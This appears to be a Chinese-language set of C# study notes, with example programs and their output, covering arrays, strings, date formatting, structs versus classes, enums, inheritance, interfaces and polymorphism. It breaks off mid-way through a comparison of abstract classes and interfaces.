    int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};

    C# 传递数组给函数

    ​在 C# 中,您可以传递数组作为函数的参数。您可以通过指定不带索引的数组名称来给函数传递一个指向数组的指针。

    ​下面的实例演示了如何传递数组给函数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    using System;

    namespace ArrayApplication
    {
    class MyArray
    {
    double getAverage(int[] arr, int size)
    {
    int i;
    double avg;
    int sum = 0;

    for (i = 0; i < size; ++i)
    {
    sum += arr[i];
    }

    avg = (double)sum / size;
    return avg;
    }
    static void Main(string[] args)
    {
    MyArray app = new MyArray();
    /* 一个带有 5 个元素的 int 数组 */
    int [] balance = new int[]{1000, 2, 3, 17, 50};
    double avg;

    /* 传递数组的指针作为参数 */
    avg = app.getAverage(balance, 5 ) ;

    /* 输出返回值 */
    Console.WriteLine( "平均值是: {0} ", avg );
    Console.ReadKey();
    }
    }
    }

    C# 字符串(String)

    创建 String 对象

    ​在 C# 中,您可以使用字符数组来表示字符串,但是,更常见的做法是使用 string 关键字来声明一个字符串变量。string 关键字是 System.String 类的别名。

    ​您可以使用以下方法之一来创建 string 对象:

    • 通过给 String 变量指定一个字符串
    • 通过使用 String 类构造函数
    • 通过使用字符串串联运算符( + )
    • 通过检索属性或调用一个返回字符串的方法
    • 通过格式化方法来转换一个值或对象为它的字符串表示形式
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;

    namespace StringApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 字符串,字符串连接
    string fname, lname;
    fname = "Rowan";
    lname = "Atkinson";

    string fullname = fname + lname;
    Console.WriteLine("Full Name: {0}", fullname);

    // 通过使用 string 构造函数
    char[] letters = { 'H', 'e', 'l', 'l', 'o' };
    string greetings = new string(letters);
    Console.WriteLine("Greetings: {0}", greetings);

    // 方法返回字符串
    string[] sarray = { "Hello", "From", "Tutorials", "Point" };
    string message = String.Join(" ", sarray);
    Console.WriteLine("Message: {0}", message);

    // 用于转化值的格式化方法
    DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
    string chat = String.Format("Message sent at {0:t} on {0:D}",
    waiting);
    Console.WriteLine("Message: {0}", chat);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    Full Name: RowanAtkinson
    Greetings: Hello
    Message: Hello From Tutorials Point
    Message: Message sent at 17:58 on 2012年10月10日

    String 类的属性

    ​Length:在当前的 String 对象中获取字符数。

    String 类的方法

    比较字符串

    String.Compare()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str1 = "This is test";
    string str2 = "This is test";

    if (String.Compare(str1, str2) == 0)
    {
    Console.WriteLine(str1 + " and " + str2 + " are equal.");
    }
    else
    {
    Console.WriteLine(str1 + " and " + str2 + " are not equal.");
    }

    Console.ReadKey();
    }
    }
    }
    1
    This is test and This is test are equal.
    字符串包含字符串

    Contains()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "This is test";
    if (str.Contains("test"))
    {
    Console.WriteLine("The sequence 'test' was found.");
    }
    Console.ReadKey();
    }
    }
    }
    1
    The sequence 'test' was found.
    获取子字符串

    Substring()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using System;
    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "01234567890123456789";
    Console.WriteLine(str);
    string substr = str.Substring(10);
    Console.WriteLine(substr);
    Console.ReadKey();
    }
    }
    }
    1
    2
    01234567890123456789
    0123456789
    连接字符串

    Join()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string[] starray = new string[]{"Down the way nights are dark",
    "And the sun shines daily on the mountain top",
    "I took a trip on a sailing ship",
    "And when I reached Jamaica",
    "I made a stop"};

    string str = String.Join("\n", starray);
    Console.WriteLine(str);
    Console.ReadKey() ;
    }
    }
    }
    1
    2
    3
    4
    5
    Down the way nights are dark
    And the sun shines daily on the mountain top
    I took a trip on a sailing ship
    And when I reached Jamaica
    I made a stop

    string.Format 格式化日期

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
    string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
    string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
    string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
    string.Format("{0:t tt}", dt);// 下 下午
    string.Format("{0:H HH}", dt);// 13 13
    string.Format("{0:h hh}", dt);// 1 01
    string.Format("{0:m mm}", dt);// 16 16
    string.Format("{0:s ss}", dt);// 32 32
    string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
    string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
    string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

    string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
    string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
    string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
    string.Format("{0:yyyyMMdd}", dt);         // 20170401
    string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

    ​除去 string.Format() 可以对日期进行格式化之外,.ToString() 也可以实现相同的效果:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    DateTime dt = new DateTime(2017,4,1,13,16,32,108);
    dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
    dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
    dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
    dt.ToString("t tt"); // 下 下午
    dt.ToString("H HH"); // 13 13
    dt.ToString("h hh"); // 1 01
    dt.ToString("m mm"); // 16 16
    dt.ToString("s ss"); // 32 32
    dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
    dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
    dt.ToString("z zz zzz"); // +8 +08 +08:00

    dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
    dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
    dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
    dt.ToString("yyyyMMdd"); // 20170401
    dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108

    C# 结构体(Struct)

    ​在 C# 中,结构体(struct)是一种值类型(value type),用于组织和存储相关数据。

    ​在 C# 中,结构体是值类型数据结构,这样使得一个单一变量可以存储各种数据类型的相关数据。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    using System;
    using System.Text;

    struct Books
    {
    public string title;
    public string author;
    public string subject;
    public int book_id;
    };

    public class testStructure
    {
    public static void Main(string[] args)
    {
    /* 声明 Book1,类型为 Books */
    Books Book1;
    /* 声明 Book2,类型为 Books */
    Books Book2;

    /* book 1 详述 */
    Book1.title = "C Programming";
    Book1.author = "Nuha Ali";
    Book1.subject = "C Programming Tutorial";
    Book1.book_id = 6495407;

    /* book 2 详述 */
    Book2.title = "Telecom Billing";
    Book2.author = "Zara Ali";
    Book2.subject = "Telecom Billing Tutorial";
    Book2.book_id = 6495700;

    /* 打印 Book1 信息 */
    Console.WriteLine("Book 1 title : {0}", Book1.title);
    Console.WriteLine("Book 1 author : {0}", Book1.author);
    Console.WriteLine("Book 1 subject : {0}", Book1.subject);
    Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

    /* 打印 Book2 信息 */
    Console.WriteLine("Book 2 title : {0}", Book2.title);
    Console.WriteLine("Book 2 author : {0}", Book2.author);
    Console.WriteLine("Book 2 subject : {0}", Book2.subject);
    Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

    Console.ReadKey();

    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    Book 1 title : C Programming
    Book 1 author : Nuha Ali
    Book 1 subject : C Programming Tutorial
    Book 1 book_id : 6495407
    Book 2 title : Telecom Billing
    Book 2 author : Zara Ali
    Book 2 subject : Telecom Billing Tutorial
    Book 2 book_id : 6495700

    类 vs 结构

    ​类和结构在设计和使用时有不同的考虑因素,类适合表示复杂的对象和行为,支持继承和多态性,而结构则更适合表示轻量级数据和值类型,以提高性能并避免引用的管理开销。

    ​类和结构有以下几个基本的不同点:

    值类型 vs 引用类型:

    • 结构是值类型(Value Type): 结构是值类型,它们在栈上分配内存,而不是在堆上。当将结构实例传递给方法或赋值给另一个变量时,将复制整个结构的内容。
    • 类是引用类型(Reference Type): 类是引用类型,它们在堆上分配内存。当将类实例传递给方法或赋值给另一个变量时,实际上是传递引用(内存地址)而不是整个对象的副本。

    继承和多态性:

    • 结构不能继承: 结构不能继承其他结构或类,也不能作为其他结构或类的基类。
    • 类支持继承: 类支持继承和多态性,可以通过派生新类来扩展现有类的功能。

    默认构造函数:

    • 结构不能有无参数的构造函数: 结构不能包含无参数的构造函数。每个结构都必须有至少一个有参数的构造函数。
    • 类可以有无参数的构造函数: 类可以包含无参数的构造函数,如果没有提供构造函数,系统会提供默认的无参数构造函数。

    赋值行为:

    • 类型为类的变量在赋值时存储的是引用,因此两个变量指向同一个对象。
    • 结构变量在赋值时会复制整个结构,因此每个变量都有自己的独立副本。

    传递方式:

    • 类型为类的对象在方法调用时通过引用传递,这意味着在方法中对对象所做的更改会影响到原始对象。
    • 结构对象通常通过值传递,这意味着传递的是结构的副本,而不是原始结构对象本身。因此,在方法中对结构所做的更改不会影响到原始对象。

    可空性:

    • **结构体是值类型,不能直接设置为 null:**因为 null 是引用类型的默认值,而不是值类型的默认值。如果你需要表示结构体变量的缺失或无效状态,可以使用 Nullable<T> 或称为 T? 的可空类型。
    • 类默认可为 null: 类的实例默认可以为 null,因为它们是引用类型。

    性能和内存分配:

    • 结构通常更轻量: 由于结构是值类型且在栈上分配内存,它们通常比类更轻量,适用于简单的数据表示。
    • 类可能有更多开销: 由于类是引用类型,可能涉及更多的内存开销和管理。

    ​以下实例中,MyStruct 是一个结构,而 MyClass 是一个类。

    ​注释部分演示了结构不能包含无参数的构造函数、不能继承以及结构的实例复制是复制整个结构的内容。与之相反,类可以包含无参数的构造函数,可以继承,并且实例复制是复制引用。

    class 有点像 python,如果要向 struct 一样修改实例不影响其他实例,需要自己在 class 内定义一个类似 .copy() 的函数)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    using System;

    // 结构声明
    struct MyStruct
    {
    public int X;
    public int Y;

    // 结构不能有无参数的构造函数
    // public MyStruct()
    // {
    // }

    // 有参数的构造函数
    // CS0171必须先完全分配字段 'MyStruct.Y' ,然后才能将控件返回给调用方。请考虑更新到语言版本 '11.0' 以自动默认字段
    public MyStruct(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 结构不能继承
    // struct MyDerivedStruct : MyBaseStruct
    // {
    // }
    }

    // 类声明
    class MyClass
    {
    public int X;
    public int Y;

    // 类可以有无参数的构造函数
    public MyClass()
    {
    }

    // 有参数的构造函数
    public MyClass(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 类支持继承
    // class MyDerivedClass : MyBaseClass
    // {
    // }

    public MyClass ShallowCopy()
    {
    return (MyClass)this.MemberwiseClone();
    }
    }

    class Program
    {
    static void Main()
    {
    // 结构是值类型,分配在栈上
    MyStruct structInstance1 = new MyStruct(1, 2);
    MyStruct structInstance2 = structInstance1; // 复制整个结构

    // 类是引用类型,分配在堆上
    MyClass classInstance1 = new MyClass(3, 4);
    MyClass classInstance2 = classInstance1; // 复制引用,指向同一个对象
    MyClass classInstance3 = classInstance1.ShallowCopy(); // 浅拷贝,指向不同对象

    // 修改结构实例不影响其他实例
    structInstance1.X = 5;
    Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

    // 修改类实例会影响其他实例
    classInstance1.X = 6;
    Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
    }
    }
    1
    2
    Struct: 5, 1
    Class: 6, 6, 3

    C# 枚举(Enum)

    ​枚举列表中的每个符号代表一个整数值,一个比它前面的符号大的整数值。默认情况下,第一个枚举符号的值是 0,当然也可以自己设置。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    using System;

    public class EnumTest
    {
    enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

    static void Main()
    {
    Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
    }
    }
    1
    Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10

    C# 类(Class)

    类的定义

    ​类的定义是以关键字 class 开始,后跟类的名称。类的主体,包含在一对花括号内。下面是类定义的一般形式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <access specifier> class  class_name 
    {
    // member variables
    <access specifier> <data type> variable1;
    <access specifier> <data type> variable2;
    ...
    <access specifier> <data type> variableN;
    // member methods
    <access specifier> <return type> method1(parameter_list)
    {
    // method body
    }
    <access specifier> <return type> method2(parameter_list)
    {
    // method body
    }
    ...
    <access specifier> <return type> methodN(parameter_list)
    {
    // method body
    }
    }
    • 访问标识符 <access specifier> 指定了对类及其成员的访问规则。如果没有指定,则使用默认的访问标识符。类的默认访问标识符是 internal,成员的默认访问标识符是 private
    • 数据类型 <data type> 指定了变量的类型,返回类型 <return type> 指定了返回的方法返回的数据类型。
    • 如果要访问类的成员,你要使用点(.)运算符。
    • 点运算符链接了对象的名称和成员的名称。

    成员函数和封装

    ​类的成员函数是一个在类定义中有它的定义或原型的函数,就像其他变量一样。作为类的一个成员,它能在类的任何对象上操作,且能访问该对象的类的所有成员。

    ​成员变量是对象的属性(从设计角度),且它们保持私有来实现封装。这些变量只能使用公共成员函数来访问。

    ​让我们使用上面的概念来设置和获取一个类中不同的类成员的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    using System;
    namespace BoxApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度
    public void setLength(double len)
    {
    length = len;
    }

    public void setBreadth(double bre)
    {
    breadth = bre;
    }

    public void setHeight(double hei)
    {
    height = hei;
    }
    public double getVolume()
    {
    return length * breadth * height;
    }
    }
    class Boxtester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    double volume; // 体积


    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    Console.ReadKey();
    }
    }
    }
    1
    2
    Box1 的体积: 210
    Box2 的体积: 1560

    C# 中的构造函数

    ​类的 构造函数 是类的一个特殊的成员函数,当创建类的新对象时执行

    ​构造函数的名称与类的名称完全相同,它没有任何返回类型。

    默认的构造函数没有任何参数。但是如果你需要一个带有参数的构造函数可以有参数,这种构造函数叫做参数化构造函数。(反正跟 C++/Javascript 一样。)

    C# 中的析构函数

    ​类的 析构函数 是类的一个特殊的成员函数,当类的对象超出范围时(之后不再有用,销毁)执行。

    ​析构函数的名称是在类的名称前加上一个波浪形(~)作为前缀,它不返回值,也不带任何参数。

    ​析构函数用于在结束程序(比如关闭文件、释放内存等)之前释放资源。析构函数不能继承或重载。

    C# 类的静态成员

    ​我们可以使用 static 关键字把类成员定义为静态的。当我们声明一个类成员为静态时,意味着无论有多少个类的对象被创建,只会有一个该静态成员的副本

    ​关键字 static 意味着类中只有一个该成员的实例。静态变量用于定义常量,因为它们的值可以通过直接调用类而不需要创建类的实例来获取。静态变量可在成员函数或类的定义外部进行初始化。你也可以在类的定义内部初始化静态变量。

    ​你也可以把一个成员函数声明为 static这样的函数只能访问静态变量。静态函数在对象被创建之前就已经存在。下面的实例演示了静态函数的用法:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    using System;
    namespace StaticVarApplication
    {
    class StaticVar
    {
    public static int num;
    public void count()
    {
    num++;
    }
    public static int getNum()
    {
    return num;
    }
    }
    class StaticTester
    {
    static void Main(string[] args)
    {
    StaticVar s = new StaticVar();
    s.count();
    s.count();
    s.count();
    Console.WriteLine("变量 num: {0}", StaticVar.getNum());
    Console.ReadKey();
    }
    }
    }
    1
    变量 num: 3

    C# 继承

    ​继承是面向对象程序设计中最重要的概念之一。继承允许我们根据一个类来定义另一个类,这使得创建和维护应用程序变得更容易。同时也有利于重用代码和节省开发时间。

    ​当创建一个类时,程序员不需要完全重新编写新的数据成员和成员函数,只需要设计一个新的类,继承了已有的类的成员即可。这个已有的类被称为的基类,这个新的类被称为派生类

    ​继承的思想实现了 属于(IS-A) 关系。例如,哺乳动物 属于(IS-A) 动物,狗 属于(IS-A) 哺乳动物,因此狗 属于(IS-A) 动物。

    基类和派生类

    ​一个类可以继承自另一个类,被称为基类(父类)和派生类(子类)。

    ​C# 不支持类的多重继承,但支持接口的多重继承,一个类可以实现多个接口。

    ​**概括来说:**一个类可以继承多个接口,但只能继承自一个类。

    ​C# 中创建派生类的语法如下:

    1
    2
    3
    4
    5
    6
    7
    8
    <访问修饰符> class <基类>
    {
    ...
    }
    class <派生类> : <基类>
    {
    ...
    }

    ​派生类会继承基类的成员(字段、方法、属性等),除非它们被明确地标记为私有(private)。

    派生类可以通过关键字 base 来调用基类的构造函数和方法。

    基类的初始化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("长度: {0}", length);
    Console.WriteLine("宽度: {0}", width);
    Console.WriteLine("面积: {0}", GetArea());
    }
    }//end class Rectangle
    class Tabletop : Rectangle
    {
    private double cost;
    public Tabletop(double l, double w) : base(l, w)
    { }
    public double GetCost()
    {
    double cost;
    cost = GetArea() * 70;
    return cost;
    }
    public void Display()
    {
    base.Display();
    Console.WriteLine("成本: {0}", GetCost());
    }
    }
    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Tabletop t = new Tabletop(4.5, 7.5);
    t.Display();
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    4
    长度: 4.5
    宽度: 7.5
    面积: 33.75
    成本: 2362.5

    Tabletop 所定义的 Display() 将会覆盖 Rectangle 所定义的 Display(),如果没有 base.Display(); 语句,则 Rectangle.Display() 将不会执行。

    继承接口(Interface Inheritance)

    ​一个接口可以继承自一个或多个其他接口,派生接口继承了基接口的所有成员。

    ​派生接口可以扩展基接口的成员列表,但不能改变它们的访问修饰符。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    using System;

    // 定义一个基接口
    interface IBaseInterface
    {
    void Method1();
    }

    // 定义一个派生接口,继承自基接口
    interface IDerivedInterface : IBaseInterface
    {
    void Method2();
    }

    // 实现派生接口的类
    class MyClass : IDerivedInterface
    {
    public void Method1()
    {
    Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
    Console.WriteLine("Method2 implementation");
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建 MyClass 类的实例
    MyClass obj = new MyClass();

    // 调用继承自基接口的方法
    obj.Method1();

    // 调用派生接口新增的方法
    obj.Method2();
    }
    }

    ​接口(interface)与类(class)在面向对象编程中有着明显的区别和用途:

    1. 定义与用途
      • 类(class) 是一种具体的数据结构,用来封装数据和行为(即方法)。类可以实例化为对象,对象具有类定义的属性和方法。
      • 接口(interface) 是一种抽象的数据类型,它定义了一组方法(和常量),但没有实现这些方法的具体代码。接口定义了一个协议或契约,约定了实现类需要提供的方法。
    2. 实现方式
      • 可以包含字段、属性、方法、构造函数等实现代码,它提供了具体的数据和行为。
      • 接口 只能定义方法、属性、事件和索引器的签名,但没有具体的实现。实现接口的类必须提供接口中定义的所有成员的具体实现。
    3. 继承关系
      • 可以继承自其他类,形成类的层次结构。一个类可以继承自另一个类的字段和方法,并且可以重写父类的方法或者增加新的方法。
      • 接口 可以被类实现,一个类可以实现一个或多个接口。接口之间可以进行多重继承,即一个接口可以继承多个其他接口。
    4. 使用场景
      • 适合用于描述具体的对象和实现复杂的行为,它们可以包含状态(字段)和行为(方法)。
      • 接口 适合用于定义对象应该具备的功能,而不关心具体的实现细节。接口可以帮助在不同的类之间建立约定,使得代码更加模块化和可扩展。

    ​总结来说,类是对数据和行为的具体实现,而接口是对功能和行为的抽象描述。在设计和编程中,合理地使用类和接口可以使代码更加灵活、可维护和可扩展。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    using System;

    // 定义一个基接口
    interface IBaseInterface
    {
    void Method1();
    }

    // 定义一个派生接口,继承自基接口(接口一样可以继承)
    interface IDerivedInterface : IBaseInterface
    {
    void Method2();
    }

    // 实现派生接口的类(必须实现,不然编译失败)
    class MyClass : IDerivedInterface
    {
    public void Method1()
    {
    Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
    Console.WriteLine("Method2 implementation");
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建 MyClass 类的实例
    MyClass obj = new MyClass();

    // 调用继承自基接口的方法
    obj.Method1();

    // 调用派生接口新增的方法
    obj.Method2();
    }
    }

    C# 多重继承

    ​C++ 里的多重继承:C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客

    ​多重继承指的是一个类别可以同时从多于一个父类继承行为与特征的功能。与单一继承相对,单一继承指一个类别只可以继承自一个父类。

    C# 不支持多重继承。但是,您可以使用接口来实现多重继承(C# 不支持继承多个基类,但是可以继承多个接口)。下面的程序演示了这点:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    using System;
    namespace InheritanceApplication
    {
    class Shape
    {
    public void setWidth(int w)
    {
    width = w;
    }
    public void setHeight(int h)
    {
    height = h;
    }
    protected int width;
    protected int height;
    }

    // 基类 PaintCost
    public interface PaintCost
    {
    int getPaintCost(int area);

    }

    // 基类 FlatCost
    public interface FlatCost
    {
    int getFlatCost(int area);

    }
    // 派生类
    class Rectangle : Shape, PaintCost, FlatCost
    {
    public int getArea()
    {
    return (width * height);
    }
    public int getPaintCost(int area)
    {
    return area * 70;
    }
    public int getFlatCost(int area)
    {
    return area * 20;
    }
    }
    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle Rect = new Rectangle();
    int area;
    Rect.setWidth(5);
    Rect.setHeight(7);
    area = Rect.getArea();
    // 打印对象的面积
    Console.WriteLine("总面积: {0}", Rect.getArea());
    Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
    Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    总面积: 35
    油漆总成本: $2450
    工本费: $700

    C# 多态性

    多态是同一个行为具有多个不同表现形式或形态的能力。

    多态性意味着有多重形式。在面向对象编程范式中,多态性往往表现为"一个接口,多个功能"。

    ​多态性可以是静态的或动态的。在静态多态性中,函数的响应是在编译时发生的。在动态多态性中,函数的响应是在运行时发生的。

    ​在 C# 中,每个类型都是多态的,因为包括用户定义类型在内的所有类型都继承自 Object。

    ​现实中,比如我们按下 F1 键这个动作:

    • 如果当前在 Flash 界面下弹出的就是 AS 3 的帮助文档;

    • 如果当前在 Word 下弹出的就是 Word 帮助;

    • 在 Windows 下弹出的就是 Windows 帮助和支持。

      同一个事件发生在不同的对象上会产生不同的结果。(这就是多态!)

    静态多态性

    在编译时,函数和对象的连接机制被称为早期绑定,也被称为静态绑定。C# 提供了两种技术来实现静态多态性。分别为:

    • 函数重载
    • 运算符重载
    函数重载

    ​您可以在同一个范围内对相同的函数名有多个定义。函数的定义必须彼此不同,可以是参数列表中的参数类型不同,也可以是参数个数不同(总之就是参数定义不同)。不同重载只有返回类型不同的函数声明。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    using System;
    namespace PolymorphismApplication
    {
    public class TestData
    {
    public int Add(int a, int b, int c)
    {
    return a + b + c;
    }
    public int Add(int a, int b)
    {
    return a + b;
    }
    }
    class Program
    {
    static void Main(string[] args)
    {
    TestData dataClass = new TestData();
    int add1 = dataClass.Add(1, 2);
    int add2 = dataClass.Add(1, 2, 3);

    Console.WriteLine("add1 :" + add1);
    Console.WriteLine("add2 :" + add2);
    }
    }
    }

    动态多态性

    ​静态多态性(Static Polymorphism)和动态多态性(Dynamic Polymorphism)是面向对象编程中多态性的两种实现方式,它们之间的主要区别在于如何确定调用的具体方法或函数。

    1. 静态多态性(编译时多态性)
      • 静态多态性是在编译时确定方法的调用,根据编译时的类型信息来决定具体调用哪个方法。
      • 主要实现方式是函数重载(Overloading)和运算符重载(Operator Overloading)。在函数重载中,编译器根据调用时使用的参数类型或数量来选择正确的函数版本。
      • 静态多态性的优势在于效率高,因为在编译时已经确定了调用的具体方法,无需在运行时进行额外的查找或判断。
    2. 动态多态性(运行时多态性)
      • 动态多态性是在运行时根据对象的实际类型来确定方法的调用。
      • 主要实现方式是通过继承和方法重写(Override),以及接口和虚方法的实现。通过继承,子类可以重写父类的方法,在程序运行时根据对象的实际类型调用正确的方法版本。
      • 动态多态性的优势在于灵活性和扩展性,因为它允许在运行时根据实际情况来决定方法的调用,从而支持更加复杂和动态的程序逻辑。

    ​C# 允许您使用关键字 abstract 创建抽象类,用于提供接口的部分类的实现。当一个派生类继承自该抽象类时,实现即完成。抽象类包含抽象方法,抽象方法可被派生类实现。派生类具有更专业的功能。

    ​请注意,下面是有关抽象类的一些规则:

    • 您不能创建一个抽象类的实例。
    • 您不能在一个抽象类外部声明一个抽象方法。
    • 通过在类定义前面放置关键字 sealed,可以将类声明为密封类。当一个类被声明为 sealed 时,它不能被继承。抽象类不能被声明为 sealed。

    ​在 C# 中,抽象类(abstract class)和接口(interface)是两种用于实现多态性的重要机制,它们有几个关键的区别:

    1. 定义和用途:
      • 抽象类: 是一个类,可以包含抽象方法(没有实现的方法)和具体方法(有实现的方法)。抽象类不能被实例化,只能被继承。子类必须实现(重写)抽象类中的所有抽象方法,除非子类也声明为抽象类。抽象类可以包含字段、属性、构造函数等。
